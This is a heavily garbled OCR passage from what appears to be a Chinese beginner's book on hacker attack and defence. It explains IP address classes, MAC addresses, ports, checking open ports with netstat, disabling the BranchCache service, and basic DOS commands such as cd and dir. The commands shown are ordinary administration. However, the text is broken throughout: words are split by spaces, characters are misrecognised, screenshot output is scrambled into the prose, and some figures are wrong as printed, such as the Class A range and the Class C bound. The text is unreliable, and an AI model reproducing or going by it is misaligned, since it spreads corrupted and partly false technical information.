的 网 络 段 编号 ， 主 机 号 则 表示 该 网 段 中 该 
主机 的 地 址 编号 。 

按照 网 络 规模 的 大 小 ，IP 地 址 可 以 分 
为 A、B、C、D、E 五 类 ， 其 中 A、B、C 类 
是 三 种 主要 的 类 型 地 址 ，D 类 专 供 多 目 传 送 
用 的 多 目地 址 ，E 类 用 于 扩展 备用 地 址 。 

e A 类 IP 地 址 。 一 个 A 类 IP 地 址 由 1 

字 节 的 网 络 地 址 和 3 字 节 主机 地 
址 组 成 ， 网 络 地 址 的 最 高 位 必须 
是 “0”， 地 址 范围 从 1.0.0.0 到 


126.0.0.0。 
e B 类 IP 地 址 。 一 个 B 类 IP 地 址 由 2 字 
节 的 网 络 地 址 和 2 字 节 的 主机 地 址 


组 成 ， 网 络 地 址 的 最 高 位 必须 是 
“10”， 地 址 范围 从 128.0.0.0 到 
191.255.255.255。 

e C 类 IP 地 址 。 一 个 C 类 IP 地 址 由 3 字 
节 的 网 络 地 址 和 1 字 节 的 主机 地 址 
组 成 ， 网 络 地 址 的 最 高 位 必须 是 
“110”。 地 址 范围 从 192.0.0.0 到 
723355255 255。 

e D 类 IP 地 址 第 一 个 字 节 以 “1110” 开 
始 ， 它 是 一 个 专门 保留 的 地 址 。 它 
并 不 指 同 特定 的 网 络 ， 目 前 这 一 类 
地 址 被 用 在 多 点 广播 (Multicast) 
中 。 多 点 广播 地 址 用 来 一 次 寻 址 一 


组 计算 机 ， 它 标识 共享 同一 协议 的 
一 组 计算 机 。 
e 上 类 IP 地 址 。 以 “11110” 开 始 ， 为 将 
来 使 用 保留 ， 全 零 (“0.0.0.0”) 
地 址 对 应 于 当前 主机 ; 全 “1” 的 IP 
地 址 (“255.255.255.255”) 是 当 
前 子 网 的 广播 地 址 。 
具体 来 讲 ， 一 个 完整 的 IP 地 址 信息 应 
该 包括 卫 地 址 、 子 网 掩 码 、 默 认 网 关 和 DNS 
等 4 部 分 。 只 有 这 4 部 分 协同 工作 ， 才 能 与 
互联 网 中 的 计算 机 相互 访问 。 
e 子 网 掩 码 : 子 网 掩 码 是 与 IP 地 址 结 
合 使 用 的 一 种 技术 。 主 要 作用 有 两 
个 : 一 是 用 于 确定 IP 地 址 中 的 网 络 
号 和 主机 号 ， 二 是 用 于 将 一 个 大 的 
IP 网 络 划 分 为 寿 干 小 的 子 网 络 。 
e 默认 网 关 : 默认 网 关 意 为 一 台 主 机 
如 果 找 不 到 可 用 的 网 关 ， 就 把 数据 
包 发 送 给 默认 指定 的 网 天， 由 这 个 
网 关 来 处 理 数 据 包 。 
e DNS: DNS 服 务 用 于 将 用 户 的 域名 
请 求 转换 为 PP 地 址 。 


2.3.2 ”查看 IP 地 址 


计算 机 的 IP 地 址 一 旦 被 分 配 ， 可 以 说 
是 固定 不 变 的 ， 因 此 ， 查 询 出 无 线 网 络 中 
计算 机 或 终端 设备 的 人 P 地 址 ， 在 一 定 程 度 上 
就 完成 了 黑客 入 侵 的 前 提 工 作 。 使 用 ipcon- 
fig 命 令 可 以 探知 无 线 网 络 中 计算 机 或 终端 
设备 了 地 址 和 物理 地 址 。 

下 面 以 探知 无 线 网 络 中 计算 机 的 IP 地 
址 为 例 ， 来 介绍 查看 IP 地 址 的 操作 步骤 。 
右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “运行 ”菜单 命令 ， 如 下 图 所 示 。 


但 索 (9) 


运行 (R) 入 


关机 或 注销 (U) 
桌面 (D) 


— 
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打开 “运行 ”对 话 框 ， 在 “打开 ” 输 
入 框 中 输入 cmd 命 令 ， 如 下 图 所 示 。 
可 运行 XxX 


PE] Windows 将 根据 你 所 输入 的 匀称 ， 为 你 打开 柜 应 的 程序 . 
文件 灾 、 文 档 或 Internet 资源 。 


orlmd :| 


| 
[step[ 辐 单 击 “确定 ”按钮 打开“ 命令 提示 
符 ” 窗 口 ， 在 “命令 提示 符 ” 窗 口中 输入 
ipconfig， 按 Enter 键 ， 即 可 显示 出 本 机 的 IP 
信息 ， 如 下 图 所 示 。 


lows\system32\cmd.ex 
《cl 2018 Jicrosoft Corporaticon。 慢 钻 甩 首 
C:"Users\Mdrmnistrator>ipconfig 


Windows IP 配置 


以 本 网 适配器 SSTAF 1: 


体 状 态 . . . . . . . . . ，. . : 措 体 已 晰 开 和 连接 
ois ER | 


以 太 网 迄 名 器 以 本 网 2: 


。。: DHCP HDST 
: fe80::aldc:88dal:702e:el13d%5 


C:\Users\Administrator> 


仿 提 示 : 在 “命令 提示 符 ” 窗 口中 ， 
192.168.0.102 表 示 本 机 在 无 线 局 域 网 中 的 IP wares 


地 址 。 


MAC 地 址 


MAC 地 址 就 是 在 媒体 接 入 层 上 使 用 
的 地 址 ， 也 叫 物理 地 址 、 硬 件 地 址 或 链 路 
地 址 ， 由 网 络 设备 制造 商 生 产 时 写 在 硬件 
内 部 。 


2.4.1 


2.4 


认识 MAC 地 址 


有 这 个 地 址 的 硬件 (如 网 卡 、 集 线 器 、 中 8 
由 器 等 ) 接 入 到 网 络 的 何 处 ， 都 是 相同 的 
MAC 地 址 ， 它 由 厂商 写 在 网 卡 的 BIOS 里 。 

MAC 地 址 通常 表示 为 12 个 十 六 进 制 
数 ， 每 2 个 十 六 进 制 数 之 间 用 冒号 隔 开 ， 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


如 : 08:00:20:0A:8C:6D 就 是 一 个 MAC 地 
址 ， 其 中 前 6 位 十 六 进 制 数 08:00:20 代 表 网 
络 硬 件 制 造 商 的 编号 ， 它 由 IEEE 分 配 ， 而 
后 3 位 十 六 进 制 数 0A:8C:6D 代 表 该 制造 商 所 
制造 的 某 个 网 络 产 品 ( 如 网 卡 ) 的 系列 号 。 
每 个 网 络 制造 商 必须 确保 它 所 制造 的 
每 个 以 太 网 设备 都 上 共有 相同 的 前 三 个 字 


Sa eet ap yeh 。 这 样 ， ee 
MAC 地址 。 


CON 


IP 地 址 与 MAC 地 址 的 区 别 在 于 : IP 
地 址 基于 逻辑 ， 比 较 灵 活 ， 不 受 硬 件 限 
制 ， 也 容易 记忆 。MAC 地 址 在 一 定 程度 
上 与 硬件 一 致 ， 基 于 物理 ， 能 够 标识 具 
体 。 这 两 种 地 址 各 有 好 处 ， 使 用 时 也 因 
条 件 而 采取 不 同 的 地 址 。 


如 果 在 “命令 提示 符 ” 窗 口中 输入 ip- 


config /all 命 令 ， 然 后 按 Enter 键 ， 可 以 在 显 


出 的 结果 中 看 到 一 个 物理 地 址 : 6C-0B-84- 
3E-F7-AB， 这 个 就 是 用 户 自 己 的 计算 机 的 


网 卡 它 是 唯一 的 ， 如 下 图 所 示 
地 址 ， 它 是 Ys 示 。 
) 2018 好 crosoft : 
CIAUsersAAdraunistrator7yipcorftig /all 
Windows IP 配 富 
机 名 。 . -201811151 
去 DNS i 0 
Pp 跨 明 已 启用 ..,，..，,，.，.，,.,: 二 
INE "很 生 局 抽 
DNS 后 描 报 索 刘表 ，。。，。。，。: DIDHcP HB0ST 
以 本 网 适配器 SSTAP 1: 
媒体 杖 总 。，。。，。 1: 妨 体 已 断 开 连接 
i 车 es 
ne eed sian 3 Tin xz 四 
et ee : oo -FF- 6 -BO -08 pa 
DP ER 用 ，。，。，，。，，。，。:; 
自动 配 启用“''“''''': 明 
以 本 网 适配器 以 本 网 2 
诗 接 特定 的 DNS 后 织 ...,..,. : JHCP HOST 
本 ，。，。; Realtek PEIe 6BE Family © 11 
NN 理 地 址 . . .，. -25-22-FO-5F-44 
Dp 用 ee 二 
本 地铺 IFvi 地 址 fe80: :a13c:89d1:702e:el8d%5 (首选 
IPv4 地 址 . ，. 192. 168.0. 143( 首 选 ) 
子 网 的 码 . ，， 55.255, 255.0 
获得 租约 的 日 | 0 19 生 1 月 直 目 量 澳 = 上 午 11:4 
报 y 疝 于 的 时 a 019 年 1 月 15 日 星期 二 下 午 1: 
认 了 网 天 ，，，， 192. 168， 
DHOP 服务 器 ，，，， 192. 168, 0, 1 
DHCPvé IAID , . 。，。。，。。，。: 67118370 
DHCFw6 客户 闪 D0ID .00-01-00-01-23-7TE-AD-03-00-25-22-F9-5F-44 
DNS 服务 器 ,，..,，..,，. ,61.128,114. 166 
61. 128, 114. 133 
ICPIP 上 的 NetBI05 。。，。。，。: 已 和 启用 


:AIJsersAhdrinistrator7 国 
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2.5 ”什么 是 端口 


计算 机 与 外 界 通 信 交 流 的 出 口 可 以 认 
为 是 端口 。 一 个 IP 地 址 的 端口 可 以 有 65536 
( 即 256X256) 个 ， 端 口 是 通 过 端口 号 来 
标记 的 ， 端 口号 只 有 整数 ， 范 围 是 从 0 到 
65535 (256X256-1) 。 


2.5.1 认识 端口 


端口 ， 英 文 是 port。 在 计算 机 领域 中 ， 

端口 可 以 认为 是 计算 机 与 外 界 通信 交流 的 
出 口 。 计 算 机 领域 又 可 分 为 硬件 领域 和 软 
件 领域 ， 在 硬件 领域 中 ， 端 口 又 被 称 作 接 
口 ， 如 常见 的 USB 端 口 、 网 卡 接口 、 串 行 端 
口 等 ， 在 软件 领域 中 ， 端 口 一 般 是 指 网 络 中 
面 问 连接 服务 和 无 连接 服务 的 通信 协议 闯 
口 ， 是 一 种 抽象 的 软件 结构 ， 包 括 一 些 数据 
结构 和 LO (基本 输入 输出 ) 缓冲 区 。 


在 网 络 技 术 中 ， 端 口 又 有 好 几 种 意 
思 ， 一 种 是 物理 意义 上 的 端口 ， 如 集 线 
器 、 交 换 机 、 路 由 器 等 连接 设备 用 于 连接 
其 他 的 网 络 设 备 的 接口 ， 常 见 的 有 RJ-45 端 
口 、Serial 端 口 等 ， 男 一 种 是 逻辑 意义 上 的 
端口 ， 一 般 指 TCP/IP 协 议 中 的 端口 ， 范 围 
从 0 到 65535 (256X256-1) 。 


2.5.2 查看 系统 的 开放 端口 


经 常 得 看 系统 开放 端口 的 状态 变化 ， 
可 以 帮助 计算 机 用 户 及 时 提高 系统 安全 ， 


防范 黑客 通过 端口 入 侵 计 算 机 ， 用 户 可 以 

使 用 netstat 命 令 查 看 自己 系统 端口 的 状态 。 
具体 操作 步骤 如 下 。 

打开 “命令 提示 符 ” 窗 口 ， 在 其 中 输 

入 netstat -a-n 命 令 ， 如 下 图 所 示 。 


(c) 2018 Jicrosoft Corporation。 人 保留 所 有 权利 。 


:\Users\Administrator>netstat -a -ne 


[seep 图 按 Enter 键 ， 即 可 看 到 以 数字 显示 的 
TCP 和 和 UCP 连接 的 端口 号 及 其 状态 ， 如 下 图 


t inaows [hm 本 10.0. 17763. 从 


icrosof ! 
tc) 2018 Microsoft Corporaticn。 悍 留 所 有 权利 。 
C:\Users\AMdministrator>netstat -a -n 
活动 连接 
协议 ”本 地 坤 直 外 部 地 址 状 访 
TCP D0, 0. 0.0:135 0.0,0,0:0 LISTENING 
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 
TCP 0.0. 0.0:445 0.0.0,0:0 LISTEININC 
TCP 0, 0.0.0:902 0. 0.0,0:0 LISTENIN'G 
TCP D0, 0. 0.0:912 0.0.0,0:0 LISTENIING 
TCP 0, 0.0.0:3306 0.0.0,0:0 LISTENIING 
TCP 0.0.0.0:5040 0.0.0,0:0 LISTENING 
TCP 0. 0.0.0:5357 0.0.0,0:0 LISTENING 
TCP 0,.0.0.0:7909 0.0.0,0:0 LISTENING 
TCP D0.0.0.0:10143 0.0.0.0:0 LISTENING 
TCP 0, 0. 0.0:33060 0.0.0,0:0 LISTEININC 
TCP 0, U,V. 0Q:d49664 0 0 0, D0:0 LISTENING 
TCP 0,0.0.0:49665 0.0.0,0:0 LISTENING 
TCP 0.0.0.0:49666 0.0.0,0:0 LISTENIISG 
UDP D0, 0. 0.0:51985 站 ;中 
UDP 0,0.0.0:51987 站 ,站 
UDP 0.0.0.0:52876 站 ,站 
TDP 0, 0. 0.0:52878 本 ;本 
UDP DD. 0.0.0:53856 六 :本 
UDP 0.0.0.0:53857 冰 ' 亲 
UDP 0, VO. 0.0:54177 六 ;六 
UDP 0,0.0.0:58357 于 ;二 
UDP D, 0.0.0:61062 站 ;站 
UDP 127.0.0. 1:1900 站 ,六 
UDP 127. 0. 0. 1:52875 本 ;本 
UnP 127.0.0. 1:58359 站 ;本 
UDP 192. 168.0. 143:137 站 ' 丰 
UDP 192. 169. 0. 143:138 冰 ' 亲 


2.5.3 关闭 不 必要 的 端口 


默认 情况 下 ， 计 算 机 系统 中 有 很 多 没 
用 或 不 安全 的 端口 是 开局 的 ， 这 些 端 口 很 
容易 被 黑客 利用 ， 为 保障 系统 的 安全 ， 可 
以 将 这 些 不 用 的 端口 关闭。 关闭 端口 的 方 
式 有 多 种 ， 这 里 介绍 通过 关闭 无 用 服务 的 
方式 来 关闭 不 必要 的 端口 。 

下 面 以 关闭 Remote Desktop Help Ses- 
sion Manager (Windows 远 程 协助 服务 ) 为 
例 进 行 介绍 ， 有 具体 操作 步骤 如 下 。 
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右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “控制 面板 ”菜单 命令 ， 如 下 图 
所 示 。 


作 务 管理 右 (T) 


控制 面板 (P) 人 


文件 资源 管理 器 (E) 

搜索 (S) 

运行 (R) 

关机 或 注销 (U) 

点 面 (D) 

7 
打开 “控制 面板 ”窗口 ， 双 击 “ 管 理 
工具 ”图 标 ， 如 下 图 所 示 。 


国 所有 注 制 而 板 项 _ 0 x 


个 国 ， 控 制 面板 ， 所 有 扶 制 面板 项 ， | 也 妆 宋 控 堵 右 村 Pp 
文人 (月 深 沪 [E) 去 VM) 工 三 站 天 和 呈 ) 
调整 计算 机 的 设置 亚 安 方式 、 大 图 标 


Flash Player 参 Internet 选项 


Mail (Microsoft Outiook 


全 BitLocker 驱动 匡 加 安 


坪 Lenovo 高 沈 晰 音频 管理 器 虱 br RemoteApp 和 宗 面 连接 


NS 2016) 

图 Windows Defender 器 > Windows To Go 二 windows 卫 / 
各 安全 和 稚 护 寺 名 BfniERwindows7 ” 闻 程 永和 功能 
2 # 宇 同 CS 电话 和 讽 币 解 订正 个 ia 

因 和 个 性 化 恒 工作 文人 夫 Ei 
前 红 千 虎 人 。 量 宗 后 旨 

< 名 全 一 哄 兴 框 序 赁 所 管理 器 


step 图 打开 “管理 工具 ” 窗口 ， 双 卡 册 扶 :5 
务 ” 图 标 ， 如 下 图 所 示 。 


2 了 管理 工具 一 口 x 
# 训 ”二 二 0 
个 项 ， 控 齐 面板 ; 所 有 夫人 制 面板 项 》 各 理工 具 vd 安 " 竺 理工 民 ” 万 
名 忘 修改 电 凑 Es 
并 快速 访问 
绕 isCSI 发 记 栈 序 2016-07-16 16 洼 方式 
仿 OnaDrive 塞 0D8C 雪 拒 党 016-07-15 1 注 方 式 
国 此 时 及 调 Windcws 内 在 刘 断 1 1 守 汪 方式 
大 ;a5 忆 本 地 去 字 繁 略 16-07-16 16 洼 方式 
总 志 妆 清理 15-0 1 法 方式 
总 打印 管理 2016-07-16 16:26 ” 快 琵 方式 
= 入 服务 2016-07-16 16:25 ” 快 控 方 式 
重 T 莹 常言 当 才 人 Windows 防火 培 2016-07-16 16:25 。” 快 法 方式 
小 总 于 嚼 计 藻 机 咯 理 16-0 1 方式 
者 点 硬 入 计划 BE 序 16-07-16 16 着 方 
ss Windows10 [C:} | 16-07-16 1 法 方式 
Di 洛 过 请 至 至 和 优化 至 动 咎 16-( 1 代 玩 方式 
二 16-0 16 洽 方 式 
二 本 地 开 关 (E;) 到 | 至 统 信息 15-07-15 1 法 方式 
一 本地 融 半 四 门 性 5E 冯 视 址 1 1 志 现 方式 
爹 CD 亚 动 器 (G;) Mobile Partner 亲 汉 源 监 机 器 16-0 16 正方 式 
吉本 地 让 六 (H;) 第 ; 组 仁 强 所 16-07-16 1 法 方式 
蕊 网 站 
二 》 
17 个 项 目 [ 澡 蕊 


打开 “服务 ”窗口 ， 找 到 Branch 
Cache 服 务 项 ， 如 下 图 所 示 。 
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% 服务 一 口 x 
文 (SI 虽 。 控 作 (查看 rm 邦 动 (H) 

各 中 | 加 | 目 名 避 | 目 区 Pn 
3 服务 本 增 


名 称 摘 还 状态 
ActiveX Insteller [AdnstSV 为 从 
.Allloyn Router Service 路 主 
App Readiness 当 乃 , 
拱 壕 ， OApplication ldertty 确定 ,， 
此 服务 括 存 六 和 白 本 洛 子 同上 对 等 方 的 研 Application Information 使 用 .， 正在 
网 洛 和 内 容 . Tapplication Layer Gatewav Service 为 1 
Application Management 为 汉 
.AppX Deployment Service [ApPXSVO) 为 部 
Sh Background Intelligent Transfer Service 使 用 .正在 .… 
i Background Tasks Infrastructure Service 深 同 ... 正在 .… 
.Base Filtering Engine 至 本 .。 正在 ,.。 
Sh BitLocker Dnve Encrypton Service BDE... 
3 Block Level Backup Engins Service Win... 
加 Bluetooth Handsiree Service 苑 许 .. 
秽 CDPUserSwc 41bb2 读 .， 正在 
Cerificate Propagation 这 用 
Client Licanse Sevice [ClipSYO 捏 傣 , 


< > 


扩展 太 标 外/ 


双击 Branch Cache 服 务 项 ， 弹 出 
“Branch Cache 的 属性 ”对 话 框 ， 在 “局 动 
类 型 ”下 拉 列 表 框 中 选择 “禁用 ”选项 ， 
然后 单 击 “确定 ”按钮 ， 禁 用 Branch Cache 
服务 项 的 端口 ， 如 下 图 所 示 。 

BranchCache 的 层 性 (kibit 和 人 xx 


第 规 ”登录 恢复 。 依存 关系 


服务 和 名称 : PeerDistSvc 

显示 名称: BranchCache 

措 述 ， 此 服务 黎 存 来 自 本 地 子 网 上 对 等 方 的 网 阁 内 容 。 A 
可 执行 文件 的 路 径 : 


C\WINDOWS\System32\svchost.exe -k PeerDist 


启动 类型 (E): 


服务 状态 : 


启动 (9) 停止 (T) 暂停 (P) 


恢复 (R) 


当 从 此 处 启动 服务 时 ， 你 可 指定 所 适用 的 启动 参数 。 


a | 


启动 参数 (M): 


局 动 需要 开局 的 端口 


co 开局 端口 的 操作 与 关闭 端口 的 方法 类 
似 ， 下 面具 体 介 绍 通过 启动 服务 方式 开局 
端口 的 具体 操作 步骤 。 
这 里 以 上 述 关 闭 的 Branch Cache 服 务 
端口 为 例 。 在 “Branch Cache 的 属性 ”对 话 
框 中 单 击 “ 启 动 类 型 ” 右 侧 的 下 拉 按 钮 ， 
在 弹出 的 下 拉 菜 单 中 选择 “自动 ”选项 ， 
如 下 图 所 示 。 
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BranchCache 的 屋 性 (本 地 计算 机 ) xX 


常规 ”登录 恢复 。 依存 关系 


服务 名 称 : PeerDistSvc 

显示 名 称 : BranchCache 

描述 此 概 务 绎 存 来 二 本 地 了 同上 对 等 方 的 网 络 内 容 - 
可 执行 文件 的 路 径 : 


C\WINDOWS\System32\svchost.exe -k PeerDist 


启动 类型 (E): 


服务 状态 : 


启动 (9) 停止 (TD 暂停 (P) 


Cm | ww | 
单 击 “应 用 ”按钮 激活“ 启动 ” 按 
钮 ， 如 下 图 所 示 。 


BranchCache 的 屋 性 (本 地 计算 机 ) x 


第 规 ”登录 ”恢复 。 依存 关系 


服务 和 名称 : PeerDistSvd 
显示 名 称 : BranchCache 
扩 述 ; 此 服务 淫 存 来 写本 地 子 网 上 对 等 方 的 网 阁 内 容 . 
可 执行 文件 的 路 径 
CA\WINDOWS\System32\svchost.exe -k PeerDist 
启动 尖 型 (日 : 主动 We 
服务 状态 : 已 停止 
停止 (T) 暂停 (P) 恢复 (R) 


当 从 此 处 启动 服务 时 ， 你 可 指定 所 适用 的 启动 参数 ， 


启动 参数 (M): 


单 击 “ 启 动 ” 按 钮 ， 即 可 启动 Branch 
Cache 服 务 ， 再 次 单 击 “应 用 ”按钮 ， 在 
“Branch Cache 的 属性 ”对 话 框 中 可 以 看 到 
该 服务 的 “服务 状态 ”已 经 变 为 “正在 运 
行 ”， 如 下 图 所 示 。 


BranchCache 的 尾 性 (本 地 计算 机 ) Xx 


第 规 ”登录 恢复 。 依存 关系 


服务 名 称 : peerDistSvd 
显示 和 名称 : BranchCache 
撕 述 : 此 最 务 黎 存 来 自 本 地 子 网 上 对 等 方 约 网 洛 内 容 . 
可 执行 文件 的 路 径 ; 
C\WINDOWS\System32\svchost.exe -k PeerDist 
启动 并 型 (日 : 启动 v 
版 务 状态 : 正在 运行 
启动 (S) 停止 (TD) 午 停 (P) 恢复 (R) 


当 从 此 处 启动 服务 时 ， 你 可 指定 所 适用 的 启动 参数 。 


| 


单 击 “ 确 定 ” 按 钮 ， 返 回 到 “服务 ” 
图 Eee 此 时 即 可 发 现 Branch Cache 服 务 
的 “启用 类 型 ”被 设置 为 “正在 运行 ” 
这 样 就 可 以 成 功 开 启 Branch Cache 服 务 对 应 
的 端口 ， 如 下 图 所 示 。 


启动 参数 (M): 


四 全 本 
文 忻 加 “损人 FI 天 耕 fm 。 其 助 (H 
和 团 | 回 | 回国 四 | 加 本 | Pi 


BranchCache 名 称 后 述 。 状 去 
.ActiveX Installer [AxinstSVv) 为 从 -… 
EA ,Aloyn Router Service 器重 .. 
App Readiness 当 用 , 
搞 术 : © Application ldentity 硫 十 … 
此 服务 深 存 幸 目 本 抽 子 网 上 对 每 方 的 束 Application Information 便 用 ..。 正在 运行 
网 组 六 安 ， Bapplication Layer Gateway Service 为 In,。 
Application Management 为 珊 ,。 
.Appx Deployment Service IAppXSVO) 为 部 , 
© gackground Intelligent Transfer Service 靠 用 ...。 正在 运行 
3 Background Tasks Infrastructure Service 芒 神 ..，。 正在 运行 
Base Filtering Engine 基本 ,.， 正在 运行 
3 BitLocker Drive Encryption Service EDE..。 
已 Block Level Backup Engine Service Win.， 


ul uetooth Handsfree Service 人 允许- 正在 运行 


区 CDPUsc crSVc < 还 正在 和 


加 certificate Propagation 格 盾 ... 
DD cient License Service (ClipSVO) 反例 ,， 
< 


扩展/ 标 雪 / 


黑客 常用 的 DOS 命 令 


熟练 掌握 一 些 DOS 命 令 是 一 名 黑客 
的 基本 功 ， 下 面 就 来 介绍 一 些 黑客 常用 的 
DOS 命 令 ， 了 解 这 样 命令 可 以 帮助 用 户 
追踪 黑客 的 踪迹 ， 提 高 个 人 电子 设备 的 
安全 。 


2.0 
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2.6.1 cd 命令 


cd (change directory) 命令 的 作用 是 改 费 
变 当 前 目录 ， 该 命令 被 用 于 切换 路 径 目录 。 

cd 命令 主要 有 以 下 三 种 使 用 方法 : 

e cd path: path 是 路 径 ， 例 如 输入 cd 
c'\ 命 令 和 cd Windows 命 令 即 可 分 别 
切换 到 Ci\ 和 C:\Windows 目录 下 。 

e cd..: cd 后 面 的 两 个 “.” 表 示 返 回 到 
上 一 级 目录 ， 例 如 当前 的 目录 为 C: 
Windows， 如 果 输 入 cd.. 命 令 ， 按 Enter 
键 即 可 返回 到 上 一 级 目录 ， 即 C:\。 

e cd\: 表示 当前 无 论 在 哪个 子 级 目 
录 下 ， 通 过 该 命令 立即 返回 到 根 目 
录 下 。 

下 面 将 介绍 使 用 cd 命令 进入 C:\Win- 
dows\system32 子 目录 ， 并 退回 根 目 录 的 具 
att 
在 “命令 提示 符 ” 窗 口中 输入 cd ci\ 命 
2 按 Enter 键 ， 即 可 将 目录 切换 为 C:\， 如 
下 图 所 示 。 


及 本 10. 0. 17763. 104] 
(c) 2018 Jicrosoft Corporation。 和 保留 所 有 权利 。 


:AUsersAAdministrator>cd c:\ 
c:\> 


如 果 想 进入 C:\Windows\system32 目 录 
中 ， 则 需 在 上 图 的 “命令 提示 符 ” 窗 口中 
输入 cd Windows\system32 命 令 ， 按 Enter 键 
即 可 将 目录 切换 为 C:VWindows\system32， 
如 下 图 所 示 。 


Wi crosoft Windows [HR 10. 0. 17763. 104] 
(c) 2018 Jicrosoft Corporation。 人 和 保留 所 有 权利 。 


:AUsersAAdministrator>cd c:\ 


c:\>cd Windows\system32 


c: Windows‘\System32>s 
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如 果 想 返回 到 上 一 级 目录 中 ， 则 可 以 为 以 下 几 种 形式 : 
Fy “命令 提示 符 ” 窗 口中 输入 cd.. 命 令 ， 按 
Enter 键 即 可 返回 到 上 一 级 目录 下 ， 如 下 图 
所 示 。 


/as: 显示 系统 文件 的 信息 。 

/ah: 显示 隐 含 文件 的 信息 。 

/ar: 显示 只 读 文件 的 信息 。 

/aa: 显示 归档 文件 的 信息 。 

本 2018 Microsoft Corporation。 保留 所 有 权利 。 /ad: 显示 目录 信息 。 
Ulead oil 下 面 将 介绍 在 “命令 提示 符 ” 窗 口中 

ea andos\eystene2 使 用 dir 命 令 查看 磁盘 中 的 资源 的 具体 操作 

:Windows\System32>cd .. i 

在 “命令 提示 符 ” 窗 口中 输入 dir 命 
按 Enter 键 ， 即 可 查看 当前 目录 下 的 资 


源 列表 ， 如 下 图 所 示 。 
如 果 想 返回 到 根 目 录 ， 则 可 以 在 “ 价 《wereRRRRRE 
今 提 示 符 窗 口 中 输入 cd 命令 ， 按 Enter 键 or ee 0. 17763. 104] 


te) 2018 Niec crosoft 7 悍 记 所 有 想 利 。 


Bp 可 返回 到 根 目 东 下 9 A 下 图 所 未 Oo FR Dp en Serr 
人 CCDC-C901 
C-"Users\hdministrator 的 目录 


cx:AWindows>。 


本 由 5 入 ht 十 01:24 <DIR> 
s s | 019f01712/ 周 六 十 午 01:24 <DIRY _ 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 019701702y 所 三 下 午 02:48 。 <DIR》 .android 
_ 018/11f15/ 周 四 下 午 02:31 <DIR> . Androidstudio3. 2 
C:\Users\Administrator?cd c:\ 018f12/05/ 周 三 上 午 11:24 <DIR> .eclipse 
019/01/08/ 同 日 生 )4:50 DIRY .gradle 
和 019/01/15/ 同 二 上 二 11:48 <DIR» EO 
c:\>cd Windows\system32 019/01f10/ 周 四 下 午 02:59 。 <DIR> . 
018/13122/ 轩 六 上 03:18 DIRY -Pycparneots. 3 
A 0187117157 周 四 下 午 02:33 <DIR> . tooling 
: \Windows\System32>cd .. 019/01/12/ 周 六 人 下午 04:40 <DIR> . VirtualBox 
ee ee 上 12:36 <DTIRY> Contacts 
,WS 018/12/08/ 周 六 下 午 01:38 16, 384 defltbase. jfm 
:Windows>cd \ ht Ee 人 下午 D1:38 1, 048, 576 defltbase. sch 
19701/15/ 周 二 下 午 12:19 。 <DIR> Desktop 
018712114/ 轩 天 下 午 04:29 <DIR》 Documents 
018/12/081 周 六 下 午 01:45 <TIR> Dowmloads 
0187127087 周 六 不 午 06:12 DIR》 Favorites 
0187117157 周 四 ”下午 04:50 55, 429 serymticn-log. zip 
019y701709y 周 三 “上午 11:55 12, 238 info. 中 
0187117307 上 午 10:49 33, 974 java_error_in_pycharm _ 131432. 10g 
919/01/02/ 半 三 下 年 03:09 39, 401 java_error in studip_1456. log 
i 2018712126/ 同 二 小 干 02:45 36, 962 java_errcr_in studio 2992. 1og 
be a] 2 .6. 7 di 令 D18/11/157 午 12:40 DIRY Lirks 
FT RD 这 018/11/16/ 周 五 上 午 11:02 <DIR》 Music 
1 018/12/13/ 上 午 09:42 <DIR> OneDrive 
和 2018/12728/ 太 卫 有 05:17 DIRY Pictures 
， 邻 0197017127 周 关 下 午 01:24 <DIR> Samsung Balaxy lote - 41.1- Abl 
me dir 命 的 作用 是 列 出 磁盘 上 所 有 的 或 16 - g00xl230 
人 本 下 下 12:36 <TIIRY> Saved Games 
指 二 We 、 2018/11/15/ * 午 12:36 。 <DIR> Searches 
日 定 的 文件 日 录 9 ] 以 显示 的 内 容 包含 卷 20187117167 周 五 上 ‘DIR> Wideos 
, 242, 014 字 节 
一 24 4 小 御 录 13, 298: 274, 0 得 可 用 字 节 
标 、 文 件 名 、 文 件 大 小 、 文 件 建立 日 期 和 


PC:ATssrswsdministrator>。 


时 间 、 目 录 名 、 磁 盘 剩 余 空 间 等 。 
di 命令 的 格式 如 下 : 在 “命令 提示 符 ” 窗 口中 输入 dir e:/ 
[十 符 ] [路径 ] [文件 多] [7B] i701 17a: 必 性] a:d 合 令 ， 按 Enter 键 ， 即 可 查看 E 盘 下 的 所 


文件 的 目录 ， 如 下 图 所 示 。 

其 中 各 个 参数 的 作用 如 下 : 有 i 

。 p: 当 显示 的 信息 超过 一 屏 时 暂停 显 中富 
pr 直至 按 任意 键 才 继续 显示 ; :AUs 证 时 站 和 名 c:\Windows /a:h 


Ee 号 是 CCOC-C901 


® /W: 以 横 回 排列 的 形式 显示 文件 名 cliMWindows 的 目录 
和 日 :ee 每 和 了 5 个 (不 显示 文件 大 YE 许 Te a 


0187097185/ 周 六 不 午 03:33 <DIR> LanguagEOverlayCache 


小 建立 日 期 和 时 间 ) ， 0187097157 周 六 le ;70 字 世 VindowsShell, Nanifest 


s 小 自如 18 410, 578 492 可 用 字 节 

@ /a (属性 ) : 仪 显示 指定 属性 的 文 :\Users\Administrator> 
ea ea a 在 “命令 提示 符 ” 窗 口 输入 dir 
和 隐 含 文件 外 的 所 有 文件 。 可 指定 c\windows /a:h 命 令 ， 按 Enter 键 即 可 列 出 ci\ 
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cv 管理 员 ; CNAWindows\system3 md,exe [] 


Hicrosoft #indows [山本 10. 0. 17763. 104] 
[ce) 2018 Nicrosoft Dorperati os 但 留 所 有 权 刊 。 


FE MUser 二 ?dir c' Windows /a:h 
| 和 6GC05-G961 

cMWindows 的 目录 

WA 二 11: 上 起 <DIR> 
PO19701714r 午 06:50 《<DIR> 
20187097157 周 六 下 午 03:33 <DIR> LaneuageDverlayCache 
| 有 03:28 B70 WindowsShell, Nanifest 
水 670 于 

目录 13, 211, 136, 000 可 用 字 节 
C:\Users\Acministrator>s 


RitLockerDiscoreryyolumecontEntE 
Installer 


2.6.3 ”ping 命 令 


ping 命 令 是 TCP/IP 协 议 中 最 为 常用 的 
命令 之 一 ， 主 要 用 来 检查 网 络 是 否 通畅 或 
者 网 络 连接 的 速度 ， 作 为 一 个 黑客 来 说 ， 
